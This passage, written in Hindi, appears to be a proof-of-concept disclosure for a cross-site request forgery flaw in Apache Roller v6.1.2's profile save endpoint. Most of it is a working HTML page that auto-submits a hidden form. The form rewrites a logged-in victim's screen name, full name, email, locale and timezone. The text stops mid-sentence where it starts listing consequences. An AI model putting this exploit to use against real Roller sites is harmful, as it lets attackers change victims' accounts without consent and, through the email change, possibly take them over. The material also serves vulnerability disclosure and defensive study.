
Apache Roller v6.1.2 प्रोफ़ाइल अपडेट एंडपॉइंट में CSRF भेद्यता के लिए PoC एक्सप्लॉइट। अनधिकृत प्रोफ़ाइल परिवर्तनों को प्रदर्शित करने के लिए HTML फ़ॉर्म एक्सप्लॉइट कोड शामिल है।
Roller v6.1.2 और उससे निचले संस्करणों में एंडपॉइंट /roller/roller-ui/profile!save.rol पर क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) भेद्यता पाई गई है।
यह भेद्यता हमलावरों को एक क्राफ्टेड HTML पेज के माध्यम से पीड़ित उपयोगकर्ता की प्रोफ़ाइल जानकारी (जैसे, ईमेल, पूरा नाम, लोकेल, टाइमज़ोन) को मनमाने ढंग से अपडेट करने की अनुमति देती है।
यह भेद्यता CSRF सुरक्षा के बिना उपयोगकर्ता की प्रोफ़ाइल को अपडेट करने वाले /roller/roller-ui/profile!save.rol पर अनधिकृत अनुरोधों की अनुमति देती है।
<html>
<head>
<form id="exploitForm" action="http://localhost:8080/roller/roller-ui/profile!save.rol" method="POST">
<input name="bean.userName" value="vanlam" type="hidden">
<input name="bean.screenName" value="hacked" type="hidden">
<input name="bean.fullName" value="hacked" type="hidden">
<input name="bean.emailAddress" value="[email protected]" type="hidden">
<input name="bean.passwordText" value="" type="hidden">
<input name="bean.passwordConfirm" value="" type="hidden">
<input name="bean.locale" value="vi_VN" type="hidden">
<input name="bean.timeZone" value="Asia/Bangkok" type="hidden">
</form>
<script>
document.getElementById('exploitForm').submit();
</script>
</head>
</html>
bean.userName: vanlambean.screenName: hackedbean.fullName: hackedbean.emailAddress: [email protected]bean.passwordText: (खाली)bean.passwordConfirm: (खाली)bean.locale: vi_VNbean.timeZone: Asia/Bangkokएक हमलावर एक दुर्भावनापूर्ण HTML पेज तैयार कर सकता है, जिसे एक प्रमाणित Roller उपयोगकर्ता द्वारा देखे जाने पर, वह पेज बिना उनकी सहमति के पीड़ित की प्रोफ़ाइल जानकारी को अपडेट करने के लिए एक फ़ॉर्म स्वचालित रूप से सबमिट कर देगा। इससे निम्न समस्याएँ उत्पन्न हो सकती हैं: